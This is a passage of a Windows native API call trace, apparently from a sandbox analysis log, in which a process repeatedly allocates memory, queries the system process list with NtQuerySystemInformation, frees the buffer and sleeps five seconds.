ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.593] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.608] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.617] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.627] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.664] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.678] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.686] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.713] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 